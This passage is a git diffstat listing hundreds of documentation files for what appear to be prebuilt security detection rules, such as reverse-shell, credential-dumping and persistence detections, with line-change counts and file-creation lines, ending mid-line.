 ...using-a-known-sunburst-dns-domain.asciidoc |  77 ++
 ...-dump-file-with-unusual-extension.asciidoc |  86 ++
 ...engine-started-an-unusual-process.asciidoc |  10 +-
 ...ngine-started-by-a-script-process.asciidoc |  18 +-
 ...ld-engine-using-an-alternate-name.asciidoc |  10 +-
 ...-um-spawning-suspicious-processes.asciidoc |  11 +-
 ...erver-um-writing-suspicious-files.asciidoc |  11 +-
 ...ker-spawning-suspicious-processes.asciidoc |  19 +-
 ...rosoft-windows-defender-tampering.asciidoc |   6 +-
 ...cation-of-amsienable-registry-key.asciidoc |   6 +-
 ...amic-linker-preload-shared-object.asciidoc |   8 +-
 .../modification-of-openssh-binaries.asciidoc |   5 +-
 ...ntication-module-or-configuration.asciidoc |  18 +-
 ...on-of-the-mspkiaccountcredentials.asciidoc |   2 +-
 ...n-okta-application-sign-on-policy.asciidoc |   2 +-
 ...espace-manipulation-using-unshare.asciidoc |   2 +-
 ...t-listener-established-via-rlwrap.asciidoc |  66 ++
 ...network-activity-detected-via-cat.asciidoc |  10 +-
 ...-via-recently-compiled-executable.asciidoc |   2 +-
 ...nnection-via-registration-utility.asciidoc |   7 +-
 ...work-connection-via-signed-binary.asciidoc |   6 +-
 ...level-authentication-nla-disabled.asciidoc |   6 +-
 ...oweddeviceid-added-via-powershell.asciidoc |  15 +-
 ...ted-by-previously-unknown-process.asciidoc |  21 +-
 .../new-systemd-timer-created.asciidoc        |   7 +-
 .../nping-process-activity.asciidoc           |   2 +-
 .../ntds-or-sam-database-file-copied.asciidoc |   6 +-
 ...sessionpipe-registry-modification.asciidoc |  11 +-
 .../office-test-registry-persistence.asciidoc |  11 +-
 ...force-or-password-spraying-attack.asciidoc |   2 +-
 ...nsight-threat-suspected-promotion.asciidoc |   2 +-
 .../okta-user-session-impersonation.asciidoc  |   2 +-
 ...uled-task-activity-via-powershell.asciidoc |  10 +-
 .../parent-process-pid-spoofing.asciidoc      |  15 +-
 ...tence-via-hidden-run-key-detected.asciidoc |  20 +-
 ...ript-or-desktop-file-modification.asciidoc |  43 +-
 ...tence-via-microsoft-office-addins.asciidoc |   6 +-
 ...ersistence-via-powershell-profile.asciidoc |  15 +-
 ...ycontroller-scheduled-task-hijack.asciidoc |  23 +-
 ...pdate-orchestrator-service-hijack.asciidoc |  15 +-
 ...stence-via-wmi-event-subscription.asciidoc |  11 +-
 .../port-forwarding-rule-addition.asciidoc    |  11 +-
 ...-dga-command-and-control-behavior.asciidoc |   6 +-
 .../possible-okta-dos-attack.asciidoc         |   2 +-
 ...f-repeated-mfa-push-notifications.asciidoc |   2 +-
 ...ial-code-execution-via-postgresql.asciidoc |   2 +-
 ...tial-credential-access-via-dcsync.asciidoc |  15 +-
 ...tial-access-via-lsass-memory-dump.asciidoc |  11 +-
 ...ess-via-memory-dump-file-creation.asciidoc | 102 ++
 ...cess-via-renamed-com-services-dll.asciidoc |  15 +-
 ...ess-via-trusted-developer-utility.asciidoc |  27 +-
 ...tial-access-via-windows-utilities.asciidoc |  15 +-
 ...-curl-cve-2023-38545-exploitation.asciidoc |   2 +-
 ...ty-to-an-unusual-destination-port.asciidoc |  58 ++
 ...activity-to-an-unusual-ip-address.asciidoc |  58 ++
 ...n-activity-to-an-unusual-iso-code.asciidoc |  58 ++
 ...ion-activity-to-an-unusual-region.asciidoc |  58 ++
 ...tential-defense-evasion-via-proot.asciidoc |   2 +-
 .../potential-dga-activity.asciidoc           |  58 ++
 .../potential-disabling-of-apparmor.asciidoc  |   2 +-
 .../potential-disabling-of-selinux.asciidoc   |   2 +-
 ...ng-via-trusted-microsoft-programs.asciidoc |  89 ++
 ...ential-dns-tunneling-via-nslookup.asciidoc |   6 +-
 ...al-linux-ssh-brute-force-detected.asciidoc |   6 +-
 ...tential-file-transfer-via-certreq.asciidoc |  84 ++
 ...-hidden-process-via-mount-hidepid.asciidoc |   2 +-
 ...al-linux-ssh-brute-force-detected.asciidoc |   6 +-
 ...teral-tool-transfer-via-smb-share.asciidoc |   7 +-
 ...ux-backdoor-user-account-creation.asciidoc |   3 +-
 ...ntial-dumping-via-proc-filesystem.asciidoc |   2 +-
 ...x-credential-dumping-via-unshadow.asciidoc |   2 +-
 ...otential-linux-hack-tool-launched.asciidoc |  73 ++
 ...ocal-account-brute-force-detected.asciidoc |   2 +-
 ...ransomware-note-creation-detected.asciidoc |  14 +-
 ...-tunneling-and-or-port-forwarding.asciidoc |  30 +-
 ...tential-local-ntlm-relay-via-http.asciidoc |  15 +-
 ...l-masquerading-as-browser-process.asciidoc |  57 +-
 ...erading-as-business-app-installer.asciidoc |  24 +-
 ...asquerading-as-communication-apps.asciidoc |  23 +-
 ...tial-masquerading-as-system32-dll.asciidoc |  60 +-
 ...squerading-as-system32-executable.asciidoc |  19 +-
 ...potential-masquerading-as-vlc-dll.asciidoc |  19 +-
 ...tential-meterpreter-reverse-shell.asciidoc |  31 +-
 .../potential-network-scan-detected.asciidoc  |   4 +-
 ...l-network-scan-executed-from-host.asciidoc |  60 ++
 ...potential-network-share-discovery.asciidoc |  11 +-
 .../potential-network-sweep-detected.asciidoc |   4 +-
 ...-non-standard-port-ssh-connection.asciidoc |  17 +-
 ...openssh-backdoor-logging-activity.asciidoc |  46 +-
 ...rsistence-through-init-d-detected.asciidoc |   3 +-
 ...rough-motd-file-creation-detected.asciidoc |   9 +-
 ...ence-through-run-control-detected.asciidoc |   7 +-
 ...ce-via-time-provider-modification.asciidoc |  15 +-
 ...rint-processor-registration-abuse.asciidoc |  10 +-
 ...on-through-writable-docker-socket.asciidoc |   2 +-
 ...on-via-container-misconfiguration.asciidoc |   2 +-
 ...lege-escalation-via-cve-2023-4911.asciidoc |  24 +-
 ...alation-via-installerfiletakeover.asciidoc |  17 +-
 ...rivilege-escalation-via-overlayfs.asciidoc |   2 +-
 ...l-privilege-escalation-via-pkexec.asciidoc |   2 +-
 ...-escalation-via-python-cap-setuid.asciidoc |  71 ++
 ...-via-recently-compiled-executable.asciidoc |   2 +-
 ...tion-via-uid-int-max-bug-detected.asciidoc |   2 +-
 ...ation-via-samaccountname-spoofing.asciidoc |   6 +-
 ...injection-from-malicious-document.asciidoc |  93 ++
 ...-process-injection-via-powershell.asciidoc |  19 +-
 ...tocol-tunneling-via-chisel-client.asciidoc |   2 +-
 ...tocol-tunneling-via-chisel-server.asciidoc |   2 +-
 ...-protocol-tunneling-via-earthworm.asciidoc |  43 +-
 ...-pspy-process-monitoring-detected.asciidoc |  28 +-
 ...ote-code-execution-via-web-server.asciidoc |   5 +-
 ...remote-desktop-shadowing-activity.asciidoc |   6 +-
 ...remote-desktop-tunneling-detected.asciidoc |  15 +-
 ...remote-file-execution-via-msiexec.asciidoc | 107 +++
 ...verse-shell-activity-via-terminal.asciidoc |   6 +-
 ...erse-shell-via-background-process.asciidoc |   2 +-
 .../potential-reverse-shell-via-java.asciidoc |  16 +-
 ...verse-shell-via-suspicious-binary.asciidoc |   2 +-
 ...hell-via-suspicious-child-process.asciidoc |  40 +-
 .../potential-reverse-shell-via-udp.asciidoc  |  24 +-
 .../potential-reverse-shell.asciidoc          |  15 +-
 ...file-deletion-via-sdelete-utility.asciidoc |  11 +-
 ...e-read-via-command-line-utilities.asciidoc |   2 +-
 ...l-via-wildcard-injection-detected.asciidoc |   2 +-
 ...ential-ssh-it-ssh-worm-downloaded.asciidoc |  78 ++
 ...x-ftp-brute-force-attack-detected.asciidoc |  37 +-
 ...x-rdp-brute-force-attack-detected.asciidoc |  37 +-
 ...successful-ssh-brute-force-attack.asciidoc |   4 +-
 ...potential-sudo-hijacking-detected.asciidoc |   7 +-
 ...ege-escalation-via-cve-2019-14287.asciidoc |   2 +-
 ...anipulation-via-process-injection.asciidoc |   2 +-
 ...icious-debugfs-root-device-access.asciidoc |   2 +-
 .../potential-suspicious-file-edit.asciidoc   |  10 +-
...l-syn-based-network-scan-detected.asciidoc | 4 +- ...s-via-wildcard-injection-detected.asciidoc | 2 +- ...-upgrade-of-non-interactive-shell.asciidoc | 69 ++ ...indows-error-manager-masquerading.asciidoc | 6 +- .../powershell-keylogging-script.asciidoc | 6 +- ...ell-script-block-logging-disabled.asciidoc | 6 +- ...ord-policy-discovery-capabilities.asciidoc | 15 +- ...-execution-capabilities-via-winrm.asciidoc | 15 +- ...wershell-share-enumeration-script.asciidoc | 12 +- ...ery-related-windows-api-functions.asciidoc | 12 +- ...t-with-audio-capture-capabilities.asciidoc | 6 +- ...ion-by-the-microsoft-build-engine.asciidoc | 11 +- ...-started-from-process-id-pid-file.asciidoc | 4 +- ...-termination-followed-by-deletion.asciidoc | 10 +- .../psexec-network-connection.asciidoc | 15 +- .../rule-details/rare-aws-error-code.asciidoc | 2 +- .../rdp-enabled-via-registry.asciidoc | 11 +- ...istry-persistence-via-appcert-dll.asciidoc | 15 +- ...istry-persistence-via-appinit-dll.asciidoc | 11 +- .../remote-execution-via-file-shares.asciidoc | 8 +- ...e-download-via-script-interpreter.asciidoc | 15 +- ...mote-xsl-script-execution-via-com.asciidoc | 84 ++ ...-task-created-by-a-windows-script.asciidoc | 19 +- ...d-task-execution-at-scale-via-gpo.asciidoc | 11 +- ...cheduled-tasks-at-command-enabled.asciidoc | 15 +- ...ity-software-discovery-using-wmic.asciidoc | 10 +- ...urity-software-discovery-via-grep.asciidoc | 13 +- .../sensitive-files-compression.asciidoc | 4 +- ...ationprivilege-assigned-to-a-user.asciidoc | 11 +- ...ol-spawned-via-script-interpreter.asciidoc | 44 +- ...tcap-setuid-setgid-capability-set.asciidoc | 68 ++ ...ged-by-previously-unknown-process.asciidoc | 5 +- ...s-disabling-services-via-registry.asciidoc | 7 +- .../spike-in-aws-error-messages.asciidoc | 2 +- ...to-an-external-device-via-airdrop.asciidoc | 58 ++ ...-bytes-sent-to-an-external-device.asciidoc | 58 ++ ...authorized-keys-file-modification.asciidoc | 4 +- 
...-persistence-via-unsigned-process.asciidoc | 15 +- ...sudo-command-enumeration-detected.asciidoc | 2 +- .../sudoers-file-modification.asciidoc | 4 +- .../suid-sguid-enumeration-detected.asciidoc | 8 +- ...us-activity-reported-by-okta-user.asciidoc | 2 +- .../suspicious-cmd-execution-via-wmi.asciidoc | 10 +- ...s-communication-app-child-process.asciidoc | 19 +- ...racted-or-decompressed-via-funzip.asciidoc | 2 +- ...ta-encryption-via-openssl-utility.asciidoc | 2 +- ...rsistence-or-privilege-escalation.asciidoc | 15 +- ...-endpoint-security-parent-process.asciidoc | 6 +- ...s-execution-from-a-mounted-device.asciidoc | 7 +- .../suspicious-execution-via-msiexec.asciidoc | 94 ++ ...ious-execution-via-scheduled-task.asciidoc | 15 +- ...suspicious-explorer-child-process.asciidoc | 32 +- ...us-file-changes-activity-detected.asciidoc | 14 +- ...e-creation-in-etc-for-persistence.asciidoc | 2 +- ...-load-taskschd-dll-from-ms-office.asciidoc | 19 +- ...icious-imagepath-service-creation.asciidoc | 11 +- .../suspicious-java-child-process.asciidoc | 10 +- ...ious-managed-code-hosting-process.asciidoc | 4 +- ...ous-mining-process-creation-event.asciidoc | 2 +- .../suspicious-modprobe-file-event.asciidoc | 12 +- ...uspicious-ms-office-child-process.asciidoc | 17 +- ...spicious-ms-outlook-child-process.asciidoc | 28 +- .../suspicious-net-code-compilation.asciidoc | 17 +- ...ous-net-reflection-via-powershell.asciidoc | 7 +- ...-by-previously-unknown-executable.asciidoc | 77 +- ...spicious-pdf-reader-child-process.asciidoc | 21 +- ...able-encoded-in-powershell-script.asciidoc | 11 +- ...oc-pseudo-file-system-enumeration.asciidoc | 9 +- ...ess-access-via-direct-system-call.asciidoc | 11 +- ...ion-via-renamed-psexec-executable.asciidoc | 15 +- ...rocess-spawned-from-motd-detected.asciidoc | 31 +- ...picious-rdp-activex-client-loaded.asciidoc | 6 +- ...stry-access-via-sebackupprivilege.asciidoc | 6 +- ...suspicious-renaming-of-esxi-files.asciidoc | 2 +- 
...-renaming-of-esxi-index-html-file.asciidoc | 2 +- ...uspicious-script-object-execution.asciidoc | 6 +- ...startup-shell-folder-modification.asciidoc | 11 +- .../suspicious-symbolic-link-created.asciidoc | 6 +- .../suspicious-sysctl-file-event.asciidoc | 9 +- ...-by-previously-unknown-executable.asciidoc | 2 +- ...cious-termination-of-esxi-process.asciidoc | 2 +- ...leshooting-pack-cabinet-execution.asciidoc | 74 ++ ...-utility-launched-via-proxychains.asciidoc | 2 +- ...suspicious-werfault-child-process.asciidoc | 28 +- .../suspicious-which-enumeration.asciidoc | 4 +- ...process-cluster-spawned-by-a-host.asciidoc | 59 ++ ...uster-spawned-by-a-parent-process.asciidoc | 61 ++ ...process-cluster-spawned-by-a-user.asciidoc | 61 ++ ...picious-wmic-xsl-script-execution.asciidoc | 11 +- .../suspicious-zoom-child-process.asciidoc | 11 +- ...bolic-link-to-shadow-copy-created.asciidoc | 10 +- ...-or-moved-to-suspicious-directory.asciidoc | 20 +- .../system-log-file-deletion.asciidoc | 45 +- .../system-shells-via-services.asciidoc | 19 +- .../tainted-kernel-module-load.asciidoc | 63 ++ ...mporarily-scheduled-task-creation.asciidoc | 15 +- ...es-deleted-via-unexpected-process.asciidoc | 6 +- ...nternet-explorer-add-on-installer.asciidoc | 28 +- ...eged-ifileoperation-com-interface.asciidoc | 23 +- ...ia-windows-directory-masquerading.asciidoc | 23 +- ...ademanager-elevated-com-interface.asciidoc | 28 +- ...diskcleanup-scheduled-task-hijack.asciidoc | 28 +- ...icmluautil-elevated-com-interface.asciidoc | 28 +- ...a-windows-firewall-snap-in-hijack.asciidoc | 23 +- ...zed-access-to-an-okta-application.asciidoc | 2 +- .../unix-socket-connection.asciidoc | 65 ++ ...igned-bits-service-client-process.asciidoc | 72 ++ ...d-dll-loaded-by-a-trusted-process.asciidoc | 2 +- .../unsigned-dll-loaded-by-svchost.asciidoc | 28 +- ...-loading-from-a-suspicious-folder.asciidoc | 10 +- .../untrusted-driver-loaded.asciidoc | 14 +- .../unusual-aws-command-for-a-user.asciidoc | 2 +- 
.../unusual-child-process-of-dns-exe.asciidoc | 16 +- .../unusual-city-for-an-aws-command.asciidoc | 2 +- ...nusual-country-for-an-aws-command.asciidoc | 2 +- ...tion-by-a-system-critical-process.asciidoc | 11 +- ...sual-file-modification-by-dns-exe.asciidoc | 16 +- ...vity-from-a-windows-system-binary.asciidoc | 18 +- ...persistence-via-services-registry.asciidoc | 11 +- .../unusual-process-extension.asciidoc | 6 +- ...rocess-for-mssql-service-accounts.asciidoc | 21 +- ...unusual-process-spawned-by-a-host.asciidoc | 61 ++ ...ocess-spawned-by-a-parent-process.asciidoc | 61 ++ ...unusual-process-spawned-by-a-user.asciidoc | 61 ++ ...riting-data-to-an-external-device.asciidoc | 58 ++ ...t-child-process-childless-service.asciidoc | 6 +- ...user-privilege-enumeration-via-id.asciidoc | 5 +- .../virtual-machine-fingerprinting.asciidoc | 2 +- ...adow-copy-deletion-via-powershell.asciidoc | 15 +- ...ume-shadow-copy-deletion-via-wmic.asciidoc | 11 +- ...ess-child-of-common-web-processes.asciidoc | 28 +- ...isabled-via-registry-modification.asciidoc | 6 +- ...-firewall-disabled-via-powershell.asciidoc | 15 +- ...taller-with-suspicious-properties.asciidoc | 79 ++ .../windows-network-enumeration.asciidoc | 11 +- ...ndows-script-executing-powershell.asciidoc | 19 +- ...rpreter-executing-process-via-wmi.asciidoc | 10 +- .../wmi-incoming-lateral-movement.asciidoc | 23 +- .../rule-details/wmic-remote-command.asciidoc | 6 +- ...access-on-active-directory-object.asciidoc | 6 +- docs/index.asciidoc | 2 + 758 files changed, 38264 insertions(+), 1644 deletions(-) create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc create mode 
100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc create mode 
100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc create mode 100644 
